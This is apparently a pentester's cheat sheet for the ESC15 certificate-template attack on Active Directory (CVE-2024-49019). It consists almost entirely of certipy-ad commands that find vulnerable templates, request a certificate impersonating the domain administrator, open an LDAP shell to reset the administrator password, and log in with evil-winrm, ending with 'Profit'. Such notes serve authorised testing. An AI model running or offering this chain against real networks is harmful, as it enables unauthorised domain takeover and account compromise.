Technique: ESC15

CVE: CVE-2024-49019

ESC15 works only against CAs that have not received the patch for CVE-2024-49019.

1.0 certipy-ad

1.1 Find Vulnerabilities

certipy-ad find -k -no-pass -vulnerable -stdout -dc-ip $ip -target $dns'.'$domain

1.2 Request Certificate

certipy-ad req -k -no-pass \
    -dc-ip $ip -target $dns'.'$domain \
    -ca 'CA-NAME' -template 'Template' \
    -upn 'administrator@'$domain \
    -application-policies 'Client Authentication' \
    -dc-host dc01

1.3 Authenticate and use the LDAP shell

certipy-ad auth -pfx administrator.pfx -domain $domain -dc-ip $ip -ldap-shell
ldap> change_password administrator adm!123

1.4 Profit

evil-winrm -i $ip -u administrator -p 'adm!123'